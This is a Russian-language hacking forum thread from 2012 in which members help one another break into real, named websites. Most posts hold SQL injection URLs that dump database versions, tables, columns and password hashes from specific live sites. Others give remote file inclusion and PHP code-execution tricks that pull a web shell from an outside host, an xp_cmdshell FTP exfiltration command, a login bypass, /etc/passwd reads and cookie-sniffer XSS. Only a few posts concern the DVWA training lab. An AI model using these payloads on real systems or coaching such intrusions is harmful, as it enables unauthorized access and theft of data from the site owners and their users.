Вот! Поставил оперу, отключил редирект и сработало. В ФФ почему то все равно перенаправлялось.
Спасибо.


Ошибки не возникало потому что, в новых версиях FireFox кодирует ' как %27. Нужно патчить. Патч можно скачать тут: https://rdot.org/forum/showthread.php?t=1403

er9j6@
23.01.2012, 20:07
Это MySQL?

_http://www.minprom.gov.by/organizacii?OKPO=24+union+select+1,2,3,4,5,6,7,8,9 ,10,11,12,13,14,15,16,17

er9j6@
23.01.2012, 22:21
Версию вывел, а как сейчас таблицы вывести, подскажите?

_http://www.oim.by/en/department'and(select*from(select(name_const(versi on(),1)),name_const(version(),1))a)and'

Duplicate column name '5.5.8'

justonline
24.01.2012, 01:20
Нашел активку на одном сайте...нет фильтра имени и фамилии. но стоит ограничение по символам. я разбиваю код на две части...пихаю...получается такая штука

перед .ru стоит пробел и естественно снифер не срабатывает. как можно изловчиться и исправить?

M_script
24.01.2012, 01:35
justonline, используй сервис сокращения ссылок

pirat0
26.01.2012, 00:49
+union+select+1,2,column_name,4,5,6+from+informati on_schema.columns+where+column_name+Like'%pass%'+l imit+0,20+--+

подскажите а как теперь узнать из каких именно таблиц вывелись колонки??

например вывел "password" а название таблицы у этой колонки как узнать

Konqi
26.01.2012, 00:56
pirat0 said:
+union+select+1,2,column_name,4,5,6+from+informati on_schema.columns+where+column_name+Like'%pass%'+l imit+0,20+--+
подскажите а как теперь узнать из каких именно таблиц вывелись колонки??
например вывел "password" а название таблицы у этой колонки как узнать


union select 1,2,concat(table_name,0x3a,column_name),4,5,6

pirat0
26.01.2012, 01:01
спосибо, а то название таблиц не стандартное - "a_affiliates"

faza02
26.01.2012, 01:44
Code:
http://www.stroyserver.ru/tender/index.php?id=10294981&background=FFFFFF&parent=rubricator&child=../index

немного не понял ошибку, объясните

Boolean
26.01.2012, 08:49
faza02 said:

Code:
http://www.stroyserver.ru/tender/index.php?id=10294981&background=FFFFFF&parent=rubricator&child=../index

немного не понял ошибку, объясните


index.php:


PHP:
include'include/include.php';

include'some/'.$_GET[child] .'.php';



include/include.php:


PHP:
[...]

functionstrips(){/*whatever*/}

[...]



index.php?

функция и так обозначается, и инклудя свой же файл ты вызываешь обозначение той же самой функции, но т.к. она уже обозначена ты получаешь ошибку.

Unknown
26.01.2012, 11:07
pirat0 said:
+union+select+1,2,column_name,4,5,6+from+informati on_schema.columns+where+column_name+Like'%pass%'+l imit+0,20+--+
подскажите а как теперь узнать из каких именно таблиц вывелись колонки??
например вывел "password" а название таблицы у этой колонки как узнать


Сразу выводи название таблиц и колонок, чтобы их потом отдельно не смотреть.


union select 1,2,concat_ws(0x3a,table_name,column_name),4,5,6 from information_schema.columns where column_name like '%pass%' limit 0,20-- f


UPD: Konqi уже ответил не заметил

Ro Man
26.01.2012, 12:18
возможно ли в прошивку модема адсл вшить веб шелл?

Boolean
26.01.2012, 14:16
Ro Man said:
возможно ли в прошивку модема адсл вшить веб шелл?


Зачем? Что толку от веб-шелла то?

p.s хотя можно попробовать залить cgi шелл, но не уверен.


Code:
Login: admin
Password:
NAME=DSL_2640NRU
VERSION=1.0.0
BUILDTIME=Fri Mar 18 08:01:43 UTC 2011
VENDOR=D-Link Russia
BUGS=
SUMMARY=Root filesystem image for DSL_2640NRU
BOARDID=96328AVNG_N31
For help, type 'help' or '?'.
DSL_2640NRU# sh

BusyBox v1.00 (2011.03.18-07:59+0000) Built-in shell (msh)
Enter 'help' for a list of built-in commands.

# ls /
VERSION data etc linuxrc opt sbin tmp var
bin dev lib mnt proc sys usr webs
# ls /webs/
www
# ls /webs/www
css favicon.ico index.cgi passw.html
dlink.css fwupdate.cgi index.html scripts
fastweb.cgi image info.html templates
#

qaz
26.01.2012, 17:31
Народ, помогите разкрутиить скулю, никак не могу подобрать количество колонок


http://www.gorod-dolgoprudny.ru/auto_ads.php?aid=7'

Gul4atai
26.01.2012, 18:21
Post Sql

Запрос для выполнения SQL инъекции:

POST /register.php HTTP/1.1

Host: partners.gigagame.ru

Content-Type: application/x-www-form-urlencoded

Content-Length: 78

email='&passone=1&passtwo=1&lastname=1&firstname=1&midname=1&keeper=1&Submit=1

Результат работы

тнера





Warning: mysql_numrows(): supplied argument is not a valid MySQL result resource in /home/cdmag/data/www/dvdshka.ru/partners/partners_ufunctions.php on line 264


Адрес электронной почты не может быть без символа "@"
Вы не указали адреса своих сайтов
Вы не правильно указали WMR кош



______________________________________________

Каким образом выполнить SQL инъекция по методу post исходя из текущих данных?

exzi11
26.01.2012, 20:47
Сайт на Joomle. Как определить её версию?

AlonDelon
26.01.2012, 21:09
exzi11 said:
Сайт на Joomle. Как определить её версию?


http://site.com/configuration.php-dist

или в исходниках админки:

http://www.site.com/administrator/

DeepBlue7
26.01.2012, 21:45
Вот вопросег... есть юзер mssql (2008 r2), с xp_cmdshell. Хочу зааплоудить файлики с харда серва на фтп. Делаю так со своей машины :

Start run cmd ->


Code:
ftp -A -i -s:\\IP_ADDR\Users\Public\cmd.txt IP_ADDR

Всё канает - фтп выполняет содержимое cmd.txt после подключения к ftp. Но вот если делать так :


Code:
exec xp_cmdshell 'c:\windows\system32\ftp.exe -A -i -s:\\IP_ADDR\Users\Public\cmd.txt IP_ADDR'

- канать не хочет. Пишет


Code:
Error opening script file \\IP_ADDR\Users\Public\cmd.txt.
Error opening script file \\IP_ADDR\Users\Public\cmd.txt.
NULL
Transfers files to and from a computer running an FTP server service
(sometimes called a daemon). Ftp can be used interactively.
.............................

Подскажите, что может быть не так ? )

h.elg
26.01.2012, 21:53
Движок webasyst

Посмотрел видео: http://www.youtube.com/watch?v=DgXCGzRLvYY

Дохожу до момента Duplicate entry for key group с помощью


- index.php?ukey=news&blog_id=(select+1+from+(select+count(0),concat((se lect+version()),floor(rand(0)*2))+from+SC_news_tab le+group+by+2+limit+1)a)--+


Как дальше выдрать хешы?

Колонки

U_ID

U_PASSWORD

trololoman96
26.01.2012, 21:57
ну так вместо вывода версии (select+version()) пиши свой запрос, типа


Code:
select concat_ws(0x3a,u_id,u_password) from имя_таблицы_в_которой_пасс limit 0,1

очевидно же

h.elg
26.01.2012, 22:03
не смог зделать сам по этому прошу помощь >.

qaz
26.01.2012, 23:34
Такой вопрос,


http://britishcat.ru/articlees5314+union+select+1,2,3,4.html


Скуля там или нет? если да то правильно ли я её разкручиваю(ну в смысле подбора колонок)

BigBear
27.01.2012, 00:42
qaz said:
Такой вопрос,
Скуля там или нет? если да то правильно ли я её разкручиваю(ну в смысле подбора колонок)



Скуля однозначно


Code:
http://britishcat.ru/articlees5354/**/and/**/1=1.html TRUE

http://britishcat.ru/articlees5354/**/and/**/1=2.html FALSE

http://britishcat.ru/articlees5354/**/and/**/1=1/**/group/**/by/**/1.html

Крути как слепую


Code:
http://britishcat.ru/article_s5354&post=104817/**/and/**/substring((@@version),1,1)=5.html TRUE

http://britishcat.ru/article_s5354&post=104817/**/and/**/substring((@@version),1,1)=4.html FALSE

BigBear
27.01.2012, 01:17
qaz said:
Народ, помогите разкрутиить скулю, никак не могу подобрать количество колонок

Code:
Цhttp://www.gorod-dolgoprudny.ru/auto_ads.php?aid=7'




Ничё интересного там нет... Прав на запись тоже...


Code:
FreeBSD cl1108.azar-a.net 8.2-RELEASE-p3 FreeBSD 8.2-RELEASE-p3 #0:
1004 ( apache ) Group: 1003 ( apache )
5.2.17
Safe mode: OFF
/home/admin/domains/gorod-dolgoprudny.ru/public_html/ drwxr-xr-x

h.elg
27.01.2012, 02:49
Имею дело с самописным мини-движком, имею доступ в админ-панель где можно добавлять категории, юзеров и редактировать новости, когда редактирую новости имею возможность управлять с исходным кодом страницы html, решил вставить туда шелл но открывается Bad Request. КАК можно использовать имея доступ к html?

OxoTnik
27.01.2012, 03:19
h.elg said:
Имею дело с самописным мини-движком, имею доступ в админ-панель где можно добавлять категории, юзеров и редактировать новости, когда редактирую новости имею возможность управлять с исходным кодом страницы html, решил вставить туда шелл но открывается Bad Request. КАК можно использовать имея доступ к html?


если там только html то никак, ищи другие возможности, качалки там разные, в редакторах обычно качалка шела есть

Iggy
27.01.2012, 04:28
BigBear через фото галерею шелл запилил?

BigBear
27.01.2012, 11:48
Iggy said:
BigBear
через фото галерею шелл запилил?


нет, не через фотогалерею.

NZT
27.01.2012, 18:01
Решил научиться php injection но у меня чето не получается залить шелл, уверен что делаю какую то мелочь не так поэтому не получается но что не так не знаю.

Есть тренировочный сайт DVWA , в разделе File Inclusion в строке http://localhost/denwer/dvwa/vulnerabilities/fi/?page=include.php после page как описано в статье вставляю свой шелл вот так http://localhost/denwer/dvwa/vulnerabilities/fi/?page=http://msp.hut4.ru/r57shell и вместо шелла мне показывает ошибки :

http://i30.fastpic.ru/thumb/2012/0127/98/d557a40d4799a2528c903e1bb4a02298.jpeg (http://fastpic.ru/view/30/2012/0127/d557a40d4799a2528c903e1bb4a02298.jpg.html)

Если я пишу любое слово после page= то показывает ошибки :

http://i31.fastpic.ru/thumb/2012/0127/e8/6faf59b952257add4f2d6b8d9e43e5e8.jpeg (http://fastpic.ru/view/31/2012/0127/6faf59b952257add4f2d6b8d9e43e5e8.jpg.html)

Или здесь не возможен php include ? потомучто всместо слова include должно быть main ?

Только прошу пожалуйста не трогайте мой сайт msp пока я еще не разобрался , мне он нужен для тренировок )

Помогите пожалуйста , очень хочу научиться. Поидее в DVWA на легком уровне должно все работать.

Спасибо.

h.elg
27.01.2012, 19:03
Нашел там прикрепить фотографию к новосте, открывается страница uploadp.php, пробовал загрузил шелл, пишет unable to move file...

Faaax
27.01.2012, 19:36
NZT said:
Решил научиться php injection но у меня чето не получается залить шелл, уверен что делаю какую то мелочь не так поэтому не получается но что не так не знаю.
Есть тренировочный сайт DVWA , в разделе File Inclusion в строке http://localhost/denwer/dvwa/vulnerabilities/fi/?page=include.php после page как описано в статье вставляю свой шелл вот так http://localhost/denwer/dvwa/vulnerabilities/fi/?page=http://msp.hut4.ru/r57shell и вместо шелла мне показывает ошибки
http://i30.fastpic.ru/thumb/2012/0127/98/d557a40d4799a2528c903e1bb4a02298.jpeg (http://fastpic.ru/view/30/2012/0127/d557a40d4799a2528c903e1bb4a02298.jpg.html)
Если я пишу любое слово после page= то показывает ошибки
http://i31.fastpic.ru/thumb/2012/0127/e8/6faf59b952257add4f2d6b8d9e43e5e8.jpeg (http://fastpic.ru/view/31/2012/0127/6faf59b952257add4f2d6b8d9e43e5e8.jpg.html)
Или здесь не возможен php include ? потомучто всместо слова include должно быть main ?
Только прошу пожалуйста не трогайте мой сайт msp пока я еще не разобрался , мне он нужен для тренировок )
Помогите пожалуйста , очень хочу научиться. Поидее в DVWA на легком уровне должно все работать.
Спасибо.


подставляй http://msp.hut4.ru/r57shell.php или http://msp.hut4.ru/r57shell.txt?

Boolean
27.01.2012, 20:38
Faaax said:
подставляй http://msp.hut4.ru/r57shell.php или http://msp.hut4.ru/r57shell.txt?


Там и дураку должно быть понятно, что в данном случае allow_url_include=0, а нужен allow_url_include=1

NZT
27.01.2012, 20:38
Boolean said:
Там и дураку должно быть понятно, что в данном случае allow_url_include=0, а нужен allow_url_include=1


У меня в .htaccess записано #php_flag allow_url_include on , ведь так должно быть ? А не работает . Даже не знаю что делать (

Делал и так :


HTML:
+Q. SQL Injection wont work on PHP version 5.2.6.

-A.If you are using PHP version 5.2.6 you will need to do the following in order for SQL injection and other vulnerabilities to work.

In .htaccess:

Replace:


php_flag magic_quotes_gpc off
#php_flag allow_url_fopen on
#php_flag allow_url_include on


With:


magic_quotes_gpc = Off
allow_url_fopen = On
allow_url_include = On


Тоже не помогает.

Чакэ
27.01.2012, 23:08
NZT said:



а что дальше происходит с $file? или это весь код?

NZT
27.01.2012, 23:14
Чакэ said:
а что дальше происходит с $file? или это весь код?


Это весь код , и этот код лежит в папке fi/source/low.php а просто в папке fi лежит index.php и в нем длиный скрипт и внизу написано include($file); , может одно дополняет другое, я в php не очень силен )

В Mutillidae у меня таже фигня не хочет открываться шелл. Я наверное что то не так сделал но не могу понять что.

Если кому не лень скачать себе DVWA и проверить если у него таже фигня ? )

Чакэ
28.01.2012, 00:54
NZT said:
У меня в .htaccess записано #php_flag allow_url_include on , ведь так должно быть ? А не работает . Даже не знаю что делать (
Делал и так :

HTML:
+Q. SQL Injection wont work on PHP version 5.2.6.

-A.If you are using PHP version 5.2.6 you will need to do the following in order for SQL injection and other vulnerabilities to work.

In .htaccess:

Replace:


php_flag magic_quotes_gpc off
#php_flag allow_url_fopen on
#php_flag allow_url_include on


With:


magic_quotes_gpc = Off
allow_url_fopen = On
allow_url_include = On


Тоже не помогает.


# перед строкой означает начало комментария, то есть твои два правила не действуют. не всегда срабатывает включение в .htaccess и нужно править основной php.ini сервера.

NZT
28.01.2012, 01:11
в php.ini записано allow_url_include on.

У меня в двух сайтах для тренировок не получается.

Наверное я что то не так делаю, может сервер на котором у меня шелл не тот ? сервер - holm.ru

Но там же ничего сложного нет просто после = пишешь адресс к шеллу без расширения и все?

Если я пишу mysite.ru/shell.php то шелл открывается , значит шелл нормальный.

Я все делаю как я описал выше, в чем может быть проблема? Мне вместо шелла выдаются ошибки. Кто то у себя на DVWA пробовал ? работает?

Чакэ
28.01.2012, 01:37
тот php.ini что в папке у тебя не действует из-за того что у «главного» php.ini эти флаги стоят в off, а для вебсервера «главный» приоритетней твоего. это лишь моя теория, может быть дело совсем в другом..

NZT
28.01.2012, 01:51
Думаю ты прав потому что в файле php про который я говорил не написано после php точка ini и тип у него "парметры конфигурации" и в нем записано ; This file attempts to overwrite the original php.ini file. Doesnt always work. Дело в том что я не нашел другого php.ini , как я посмотрел там его просто нет. Не подскажешь случайно где его найти или надо свой создать? И если создавать то что в него вписать надо?

Извеняюсь за столько вопросов , если засоряю тему , просто очень хочеться чтобы у меня получилась php injection. Спасибо за ответы.

trololoman96
28.01.2012, 02:08
Чакэ, вообще должно быть наоборот) иначе просто незачем было бы вводить эти дериктивы в .htaccess если php.ini все равно делает по своему.

NZT, у тебя не получается просто потому что ты делаешь не правильно. Ты пытаешься заинклудить http://msp.hut4.ru/r57shell а его у тебя на хостинге нет, даже если будешь вводить http://msp.hut4.ru/r57shell.php то тоже ничего не получится, ибо отдать тебе будет не сам php код шела а уже сгенерированный html. Тут выше уже писали, http://msp.hut4.ru/r57shell.txt должен прокатить, только предварительно залей этот файл.

NZT
28.01.2012, 02:23
C .txt? тоже ничего не получается. Я залил shell.php и shell.txt в папку www, туда их надо заливать? И почему shell.php не будет работать , вот зайди http://msp.hut4.ru/r57shell.php или http://msp.hut4.ru/r57shell.txt , все работает , или то что мне показывает это сгенерированый html? Я скорее всего не правильно заливаю на сервер как ты говоришь. Я заливаю через total commander в папку www сайта. А как надо? И спасибо тебе за желание помочь.

trololoman96
28.01.2012, 02:44
C .txt? тоже ничего не получается. Я залил shell.php и shell.txt в папку www, туда их надо заливать? И почему shell.php не будет работать , вот зайди http://msp.hut4.ru/r57shell.php или http://msp.hut4.ru/r57shell.txt , все работает , или то что мне показывает это сгенерированый html?


php на сервере интерпретируется (если там конечно есть поддержка php) , и отдает на уже ответ а не исходник самого шела, ты же когда инклудишь тебе нужен именно код, почитай http://php.su/functions/?include


Я скорее всего не правильно заливаю на сервер как ты говоришь. Я заливаю через total commander в папку www сайта. А как надо?


так и нужно, тогда нужно искать проблему с конфигурацией сервера, сервер после изменений в php.ini перезагружал ? В .htaccess коментарии поубирал как и говорилось выше ?

Brain_Enable
28.01.2012, 02:59
Вставлю и я свои 3 копейки

http://www.cmdhelp.ru/index.php?cmd=TelnetClient_send_telnet_commands'+u nion+select+SCHEMA_NAME+from+information_schema.SC HEMATA'

Ругается на точку между именем базы и таблицей. Пробовал и чаром и конкатенацией, и хекс\анхекс, но ничего не помогает.

Я думаю, что это мускул ругается на точку, так как точно знаю, что она нормально проходит и отображается, если сделать так:

http://www.cmdhelp.ru/index.php?cmd=TelnetClient_send_telnet_commands'+u nion+select+CHAR(46)'

Я тут совсем недавно, может быть что-то не понимаю? Пробовал поиск по форуму, но ничего аналогичного не нашел.

Чакэ
28.01.2012, 03:19
Brain_Enable said:
Вставлю и я свои 3 копейки
http://www.cmdhelp.ru/index.php?cmd=TelnetClient_send_telnet_commands'+u nion+select+SCHEMA_NAME+from+information_schema.SC HEMATA'
Ругается на точку между именем базы и таблицей. Пробовал и чаром и конкатенацией, и хекс\анхекс, но ничего не помогает.
Я думаю, что это мускул ругается на точку, так как точно знаю, что она нормально проходит и отображается, если сделать так:
http://www.cmdhelp.ru/index.php?cmd=TelnetClient_send_telnet_commands
'
+union+select+CHAR(46)
'
Я тут совсем недавно, может быть что-то не понимаю? Пробовал поиск по форуму, но ничего аналогичного не нашел.


текст ошибки лучше покажи.

trololoman96, ну да, ты прав в этом, но как там и написано


; This file attempts to overwrite the original php.ini file.
Doesnt always work
.

Brain_Enable
28.01.2012, 03:22
Чакэ said:
текст ошибки лучше покажи.


Когда пишу точку, говорит:

Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in /home/flash/cmdhelp.ru/index.php on line 19

Без точки нормально все получается, имею ввиду не конкретно этот запрос.

Чакэ
28.01.2012, 04:23
Brain_Enable said:
Когда пишу точку, говорит:
Warning
: mysql_fetch_row() expects parameter 1 to be resource, boolean given in /home/flash/cmdhelp.ru/index.php on line 19
Без точки нормально все получается, имею ввиду не конкретно этот запрос.


это не на точку ругается. ты не туда смотришь..


HTML:
http://www.cmdhelp.ru/index.php?cmd='+union+select+concat_ws(0x3a,table_ schema,table_name,column_name)+from+information_sc hema.columns+where+table_schema!='information_sche ma'+limit+0,1--+

далее 44 раза инкрементишь цифру 0. ну ты понел.. и ещё кажется там lfi

Киев
28.01.2012, 05:02
Привет всем.

каким должен быть запрос при авторизации чтоб это - ' or 1=1/* ))) прокатило ?

Brain_Enable
28.01.2012, 05:04
Не работает. После того как скопировал, пробелы(которые форум добавляет) естественно убрал

Почему названия столбцов разделяются двоеточием, а не запятой?

Вы сами пробовали этот код?

Юго
28.01.2012, 05:54
Киев said:
Привет всем.
каким должен быть запрос при авторизации чтоб это - ' or 1=1/* ))) прокатило ?


Примерно таким:

$mysql_query="SELECT * FROM prefix_users WHERE username=' ".$username." ' and password='".$password.'";

Тогда при вставке твоего кода получается:

$mysql_query="SELECT * FROM prefix_users WHERE username=' ' or 1=1/*" ' and password='".$password."';

То есть если нет пользователя с пустым именем, то извлекается первый попавшийся пользователь.

justonline
28.01.2012, 06:46
есть где почитать подробнее про заливку шела через картинку?

просто загнать шелл.пхп не получается..сначало резало js...потом я скрипт этот выпилил и теперь режет с серверной стороны.

переименовал шелл в шелл.пхп.жпг, получил в аватарку себе -

http://s004.radikal.ru/i206/1201/d3/24dc761002b2.png

жду советов

Unknown
28.01.2012, 07:09
Justonline

Возможно ты залил картинку,посмотри firebug'ом или в исходном коде путь картинки и запускай шелл.

PS:Народ форум IPB,можно ли через attachments как нибудь залить шелл?Мне просто интересно,доступно прикрепление файлов всех форматов,а вот по ссылке предлагает скачать..как узнать где хранится прикрепленный файл на сервере форума именно в том формате какой я залил? Или это не работает?

Установить форум и проверить нет возможности,поэтому прошу знатоков)

Чакэ
28.01.2012, 10:36
Brain_Enable said:
Не работает. После того как скопировал, пробелы(которые форум добавляет) естественно убрал
Почему названия столбцов разделяются двоеточием, а не запятой?
Вы сами пробовали этот код?


товарисч, иди кури маны. тоже мне хацкир..

Чакэ
28.01.2012, 10:39
justonline said:
есть где почитать подробнее про заливку шела через картинку?
просто загнать шелл.пхп не получается..сначало резало js...потом я скрипт этот выпилил и теперь режет с серверной стороны.
переименовал шелл в шелл.пхп.жпг, получил в аватарку себе -
http://s004.radikal.ru/i206/1201/d3/24dc761002b2.png
жду советов


/thread312513.html

er9j6@
28.01.2012, 15:14
В такой ситуации как залить шелл, или это безнадежно?

Я, понимаю, здесь запрещен инклуд и форум пропатчен, или я не прав?

http://www.site.com/forum/profile.php?mode=editprofile&bb=copy($_GET[file1],$_GET[file2]);&file1=http://web.ru/shell.txt&file2=/home/data/www/public_html/forum/shell.php

Warning: copy() [function.copy]: URL file-access is disabled in the server configuration in /home/data/www/public_html/forum/includes/usercp_register.php(888) : regexp code(1) : eval()'d code on line 1

Konqi
28.01.2012, 15:20
er9j6@ said:
В такой ситуации как залить шелл, или это безнадежно?
Я, понимаю, здесь запрещен инклуд и форум пропатчен, или я не прав?
http://www.site.com/forum/profile.php?mode=editprofile&bb=copy($_GET[file1],$_GET[file2]);&file1=http://web.ru/shell.txt&file2=/home/data/www/public_html/forum/shell.php
Warning: copy() [function.copy]: URL file-access is disabled in the server configuration in /home/data/www/public_html/forum/includes/usercp_register.php(888) : regexp code(1) : eval()'d code on line 1


через file_put_contents залей форму upload а, дальше шелл..

ReckouNT
29.01.2012, 12:13
Как заливать шеллы, используя плохую настройку .htaccess?

Ereee
29.01.2012, 12:31
ReckouNT said:
Как заливать шеллы, используя плохую настройку .htaccess?


А по точнее? Например, если льеш файл .php, а он через скрипт ренеймится в 4341843438121354131_file.php, можно полистать папки


используя плохую настройку .htaccess


.

bodrich
29.01.2012, 18:33
http://reshuege.ru/test?theme=2'))+and+(('1'='1 - возможно ли здесь стянуть что либо ? Просто параметр проходит через функцию int(), и поэтому результат не увидеть (

pirat0
29.01.2012, 21:06
такой вопрос, в пхп инъекции:

Warning: fopen(./books/chem/adams-r/1956-sbr-8/str/../../../../../../etc/passwd.str - это без нул байта

а вот это с нул байтом

Warning: fopen(./books/chem/adams-r/1956-sbr-8/str/../../../../../../etc/passwd\0.str)

вопрос как еще можно отрезать "0.str"?

Ereee
29.01.2012, 21:07
2bodrich,


Code:
http://reshuege.ru/test?pid=25171-999999.9'))+union+select+1,concat_ws(0x3a,user(),d atabase(),version()),3,4,5,6,7,8--+f



Code:
root@localhost:problems:5.1.49-3

Full Path:


Code:
/var/www/reshuege.ru/

Вообщем можно много чего вытащить ^_^ Походу папка /psprav/

доступна на запись.


bodrich said:
http://reshuege.ru/test?theme=2'))+and+(('1'='1 - возможно ли здесь стянуть что либо ?
Просто параметр проходит через функцию int(), и поэтому результат не увидеть (


2pirat0,

4096 слешей пробуй.

UPD. Нет(

pirat0
29.01.2012, 21:24
2Ereee не канает, еще может какие то мысли?

justonline
30.01.2012, 10:01
есть сайт с инъекцией. дальше вывода informaton.schemA не смог уйти.

тут светить не хочу, если кто помочь сможет - в личку пожалст.

Haviji и еще пару средств раскрутки скулей так же не смогли мне помочь

так что, думаю это мб только зелененьким позубам)

bodrich
30.01.2012, 14:15
Ereee, спасибо ! И еще вопрос, список всех таблиц узнал


http://reshuege.ru/test?pid=25171-999999.9'))+union+select+1,group_concat(0x0b,table _name),3,4,5,6,7,8+from+information_schema.tables--+


А вот что либо вытянуть не получается, ошибка


http://reshuege.ru/test?pid=25171-999999.9'))+union+select+1,2,3,4,5,6,7,8+from+prof iles--+f

Чакэ
30.01.2012, 14:33
bodrich said:
Ereee
, спасибо ! И еще вопрос, список всех таблиц узнал
А вот что либо вытянуть не получается, ошибка


может profiles в другой бд. какое поле ты хочешь вытянуть если у тебя только список таблиц есть? сливать нужно не только table_name но и table_schema и column_name и всё это, естественно брать не из ..schema.tables, а из ..schema.columns

Ereee
30.01.2012, 15:12
bodrich said:
Ereee
, спасибо ! И еще вопрос, список всех таблиц узнал
А вот что либо вытянуть не получается, ошибка


Вот так все выведет:


Code:
http://reshuege.ru/test?pid=25171-999999.9'))+union+select+1,concat(table_schema,0x3 a,table_name,0x3a,column_name),3,4,5,6,7,8+from+in formation_schema.columns+where+table_schema!='info rmation_schema'--+

Лимитов не надо, из-за особенности скрипта на сайте. Ввиде:

база:таблица:столбцы

Чакэ
30.01.2012, 15:36
Ereee said:
Вот так все выведет:

Code:
http://reshuege.ru/test?pid=25171-999999.9'))+union+select+1,concat(table_schema,0x3 a,table_name,0x3a,column_name),3,4,5,6,7,8+from+in formation_schema.columns+where+table_schema!='info rmation_schema'--+

Лимитов не надо, из-за особенности скрипта на сайте. Ввиде:
база:таблица:столбцы


concat_ws трушней. concat не выведет ничего если хоть одно поле null

Cherep
30.01.2012, 21:18
есть файл формата .dat , при открытии хекс редактором, вылетает какая то херня. Вопрос: Возможно ли привести к норм виду?

Ereee
30.01.2012, 21:25
Cherep said:
есть файл формата .dat , при открытии хекс редактором, вылетает какая то херня. Вопрос: Возможно ли привести к норм виду?


Ты про 0 и 1? Файл .dat может быть оказатся чем угодно, впрочем как и другие файлы. Если размер велик, то пробуй видео-проигрывателем.

Cherep
30.01.2012, 21:31
Ereee said:
Ты про 0 и 1? Файл .dat может быть оказатся чем угодно, впрочем как и другие файлы. Если размер велик, то пробуй видео-проигрывателем.


вид вот такой

[CODE]
Code:
њ‡*XЌ>S:Nўn(°эYЫ"њФ–Qўg)}NJтj»•®" Ђ &r_пґШ^‹Х) Ь_VШGBФ^iџN:/AЬ?ЦШ!»qYCЉд

pirat0
31.01.2012, 00:10
здрасте, вопрос такой, вот допустим раскрутил я скуля, нашол таблицу с users выдрал от туда запись с id=1, росшыфровал хеш, (при том что использовал запрос типа like '%pas%', выдало мне одну единственную таблицу, тоисть у других поля password нет, но потом я все же перебрал таблицы, действительно записи юзверей хранятся только в этой таблице) захожу в админку - меня не пускает(пробывал не только с id=1),как оказалось это таблица аворизации на самом сайте,тоисть клиенты, в чем может быть подвох? версия скуля 5.0.51a-24+lenny5, админка - CMS Terminator Engine, и где искать хеш админа??

Ereee
31.01.2012, 08:18
2Cherep,

открой любой бинарный файл блокнотом, увидишь то же самое. Откуда файл?

2pirat0,

Хорошо было бы, если скульи выложишь в теме. Но возможно, что пасс админа хранится в файле, а это облом. В выводимый столбц вставь запрос:


Code:
(%73elect(@x)%66rom(%73elect(@x:=0x00),(%73elect(n ull)%66rom(%69nformation_schema.%63olumns)%77here( %74able_schema!=0x696e666f726d6174696f6e5f73636865 6d61)%61nd(0x00)%69n(@x:=%63oncat(@x,0x3c62723e,ta ble_schema,0x2e,table_name,0x3a,%63olumn_name))))x )

Там вид база:table:column. Найти что-то типа user_rights, user_permisson, admin_user и т.п. Удачи!

pirat0
31.01.2012, 13:58
2Ereee,

я не понял твой запрос, но дело в том что я вывожу таблицы с ошибки (Duplicate entry), вставил твой запрос написало bad request?

Ereee
31.01.2012, 14:12
pirat0 said:
2Ereee,
я не понял твой запрос, но дело в том что я вывожу таблицы с ошибки (Duplicate entry), вставил твой запрос написало bad request?


Ну так все выведи через лимит. Потом найди таблицы типа permissons и т.д.

er9j6@
31.01.2012, 15:21
Есть выполнение php скрипта на сайте, как залить шелл?

http://www.site.com/index.php?s=10&id=phpinfo();

mq=on

faza02
31.01.2012, 15:24
base64_decode([]);

где [] — copy('http://site1.tu/shell.txt', './shell.php'); в base64

pirat0
31.01.2012, 16:23
Ereee said:
Ну так все выведи через лимит. Потом найди таблицы типа permissons и т.д.


так в этом и вся проблема, таблицы типа user_rights, user_permisson, admin_user и т.п. нет.

а ты говорил что пасс может быть в файле, это как то можно проверить?? (всмисле через запрос к мускулу)

Konqi
31.01.2012, 16:26
pirat0 said:
так в этом и вся проблема, таблицы типа user_rights, user_permisson, admin_user и т.п. нет.
а ты говорил что пасс может быть в файле, это как то можно проверить?? (всмисле через запрос к мускулу)


пасс в файле, такое встречается на околоафриканских сайтах, или в ретро web -е, если нету таблиц значит они в другой базе, если нету таблиц для админа значит авторизация через пароли которые хранятся внутри скрипта, включите фантазию

good.god
31.01.2012, 16:34
Надоело уже плодить темы с моими вопросами по залитию шелла, так что если я тут задам свой небольшой вопрос, надеюсь никто не будет возражать?

Могу менять имя и расширение загружаемого файла через пост запрос, но, шелл в формате jpg не грузит, так как при загрузке меняются размеры изображения и выкидывается ошибка, если в картинку в конец прописать мини-шелл и загрузить (естественно переименовать расширение в пхп), то он не работает, и вижу я только код картинки.

Кто что посоветует сделать?

pirat0
31.01.2012, 16:38
Konqi said:
если нету таблиц значит они в другой базе


базы тоже проверял, только две - information_schema и текущяя


Konqi said:
если нету таблиц для админа значит авторизация через пароли которые хранятся внутри скрипта, включите фантазию


где про это можно поподробнее прочитать??

Konqi
31.01.2012, 16:46
pirat0 said:
базы тоже проверял, только две - information_schema и текущяя
где про это можно поподробнее прочитать??


о чем прочитать? нечего там прочитать, если этот тот случий тогда вам нужен file_priv или другие средства (читалка чтоли) чтоб смотреть исходники файлов, стянуть пароль

pirat0
31.01.2012, 16:56
Konqi said:
о чем прочитать? нечего там прочитать, если этот тот случий тогда вам нужен file_priv или другие средства (читалка чтоли) чтоб смотреть исходники файлов, стянуть пароль


command denied to user - file_priv нету

(читалка это я так понимаю из розряда LFI??)

Konqi
31.01.2012, 17:04
pirat0 said:
command denied to user - file_priv нету
(читалка это я так понимаю из розряда LFI??)


или LFI с возможностю читать исходники с помощю php://filter, или читалка, file_get_contents, fopen, прочее

er9j6@
31.01.2012, 17:05
Пытаюсь создать файл со следующим содержимым

file_put_contents('lala.php', '');

http://www.site.com/index.php?s=10&id=base64_decode(ZmlsZV9wdXRfY29udGVudHMoJ2xhbGEuc GhwJywgJzw/IGVjaG8gNTAvMjsgPz4nKTs=);

mq=on

и поэтому адресу должен появиться файл

http://www.site.com/lala.php

но вместо этого:

404.

Запрошенный Вами документ отсутствует на сервере.

Konqi
31.01.2012, 17:06
er9j6@ said:
Пытаюсь создать файл со следующим содержимым
file_put_contents('lala.php', '');
http://www.site.com/index.php?s=10&id=base64_decode(ZmlsZV9wdXRfY29udGVudHMoJ2xhbGEuc GhwJywgJzw/IGVjaG8gNTAvMjsgPz4nKTs=);
mq=on
и поэтому адресу должен появиться файл
http://www.site.com/lala.php
но вместо этого:
404.
Запрошенный Вами документ отсутствует на сервере.



ты функцию base64_decode передаешь стринг, почему не вижу кавычки? если mq on, тогда

base64_decode($_GET[a]);&a=твой_base64_код

er9j6@
31.01.2012, 17:25
Konqi said:
